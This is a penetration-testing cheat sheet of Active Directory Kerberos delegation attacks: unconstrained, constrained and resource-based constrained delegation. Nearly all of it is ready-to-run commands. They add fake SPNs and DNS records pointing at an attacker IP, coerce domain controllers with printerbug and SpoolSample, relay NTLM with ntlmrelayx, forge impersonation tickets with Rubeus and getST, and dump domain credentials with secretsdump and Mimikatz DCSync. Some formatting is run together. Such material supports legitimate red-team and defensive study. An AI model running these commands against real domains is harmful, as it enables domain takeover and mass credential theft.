# Nice resource for user account =/= machine account in UC
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
# AD Objects having Unconstrained Delegation issues have the TRUSTED_FOR_DELEGATION flag set# You can search for users using Pywerview
$ python pywerview.py get-netuser -u ownedUser -p userPassword -d foo.lan -t dc1.foo.lan --unconstrained
# You can also request through ldapdomain dump and then grep for interesting
$ ldapdomaindump -u "foo.lan\\ownedUser" -p "userPassword" 192.168.30.10
$ grep TRUSTED_FOR_DELEGATION *.grep
# Using Powershell and the ADModule (https://github.com/samratashok/ADModule)
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
# Compromised User having Unconstrained Delegation# 1/ Add a fake SPN using the pwnedUser
$ python addspn.py -u foo.lan\\ownedUser -p userPassword -s host/PWNED.foo.lan ldap://dc1.foo.lan
# 2/ Create a new DNS record pointing the fake SPN to our attacking IP
$ python dnstool.py -u foo.lan\\ownedUser -p userPassword -r PWNED.foo.lan -a add -d <attacker-IP> DC1.foo.lan
# 3/ In one shell, start krbrelayx (salt is case sensitive!)
$ sudo python krbrelayx.py --krbsalt foo.lanownedUser --krbpass userPassword
# 4/ In another shell
$ python printerbug.py foo.lan/ownedUser:userPassword@DC1.foo.lan PWNED.foo.lan
# It will force the target DC to connect to our fake new "computer" configured through# Unconstrained Delegation. It will then embed a copy of the DC$ TGT, being saved by krbrelayx.# Then...exportKRB5CCNAME=/path/to/ticket.ccache
$ python secretsdump.py -k DC1.foo.lan -just-dc
# Compromised Machine/Server having Unconstrained Delegation# If you compromised a machine having UC you can use it to get a copy of the DC's TGT# In Powershell you can check for the spoolss presence
PS> ls \\<dc-ip>\pipe\spoolss
# On the compromised machine, start monitoring with Rubeus
Rubeus.exe monitor /interval:1
# Then using the SpoolSample PoC (https://github.com/leechristensen/SpoolSample)# You can force the DC to connect to the owned machine# Delegation being set, you will get a copy of the DC$ TGT in Rubeus
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
Constrained Delegation
# AD Objects having Unconstrained Delegation issues have the TRUSTED_TO_AUTH_FOR_DELEGATION flag set# The msDS-AllowedToDelegateTo indicates objects involded in the delegation rights# The goal is to get a ticket for an impseronated user on a service we have delegation rights to
getST.py -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD
# It is then possible to modify the service name portion of the ticket (not encrypted)# Impackets auto update the sname in backend# The following posts describes this behavior
https://www.secureauth.com/blog/kerberos-delegation-spns-and-more
# Once the ticket have been generated, we can then use itexportKRB5CCNAME=/path/to/ticket.ccache
$ python secretsdump.py -k DC1.foo.lan -just-dc
RBCD Exploitation
https://github.com/aas-n/leHACK19
# Microsoft is releasing an update in March 2020 that will enable LDAP channel binding & LDAP # signing by default on Windows systems, remediating this potential attack vector on fully patched systems.# When to use : # Basically, when you’re on a network and want to get a shell on a different system on that same network segment.# This attack can be ran without needing any prior credentials.# However, the method described does require that a domain controller in the environment is configured with LDAPS.
# From Windows Hosts# Importing Powerview and Powermad
Import-Module .\Powerview.ps1
Import-Module .\Powermad.ps1
# Authentication$TargetComputer="DC01.domain.lan"$SecPassword= ConvertTo-SecureString 'passw0rd' -AsPlainText -Force
$Cred= New-Object System.Management.Automation.PSCredential('DOMAIN\ControlledAccount', $SecPassword)# Get our user's SID$AttackerSID= Get-DomainUser ControlledUser -Credential $Cred -Server 10.10.10.10 -Properties objectsid | Select -Expand objectsid
$ACE= Get-DomainObjectACL $TargetComputer -Credential $Cred -Server 10.10.10.10 | ?{$_.SecurityIdentifier -match $AttackerSID}# Adding a machine and getting SID
New-MachineAccount -Credential $Cred -Domain domain.lan -DomainController 10.10.10.10 -MachineAccount lleXXXXX -Password $(ConvertTo-SecureString 'passw0rd' -AsPlainText -Force)$ComputerSID= Get-DomainComputer lleXXXXX -Credential $Cred -Server 10.10.10.10 -Properties objectsid | Select -Expand objectsid
# Creating structure to store in Allowedtoact in the DC$SD= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSID))"$SDBytes= New-Object byte[]($SD.BinaryLength)$SD.GetBinaryForm($SDBytes, 0)# Rewrite Allowedtoact properties on the DC
Get-DomainComputer $TargetComputer -Credential $Cred -Server 10.10.10.10 | Set-DomainObject -Credential $Cred -Server 10.10.10.10 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}# Now you can impersonate the domain admin account on the DC using the machine account
.\Rubeus.exe hash /password:passw0rd /user:lleXXXXX /domain:domain.lan
.\Rubeus.exe s4u /user:lleXXXXX$ /rc4:<hash> /impersonateuser:Administrator /msdsspn:ldap/DC01.domain.lan /ptt /dc:10.10.10.10 /domain:domain.lan
.\Rubeus.exe klist
# Then, you can get the NTLM hash of domain admin using DCSync and Mimikatz
.\Mimikatz.exe
mimikatz> lsadump::dcsync /user:domain\Adminisrator /domain:domain.lan /dc:DC01.domain.lan
# From Linux Hosts# First step is creating a computer account in order to have control on a computer account with SPNs
addcomputer.py -method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD
# Then you want to intercept NTLM hashes and forward them to LDAP on a DC# It allows you to impersonate the relayed account and set msDS-AllowedToActOnBehalfOfOtherIdentity
ntlmrelayx.py -wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DC.DOMAIN.LOCAL
ntlmrelayx.py -wh COMPUTER.DOMAIN.LOCAL --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DC.DOMAIN.LOCAL
# Then, start a relay tool (mitm6, responder...)# If another host authenticates succesfully and give impersonation rights, we can then use them# Then you will want to get a valid TGS to connect to the server using our new delegation rights# We can for example choose to impersonate administrators
getST.py -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD
exportKRB5CCNAME=/path/to/ticket.ccache
$ python secretsdump.py -k DC1.foo.lan -just-dc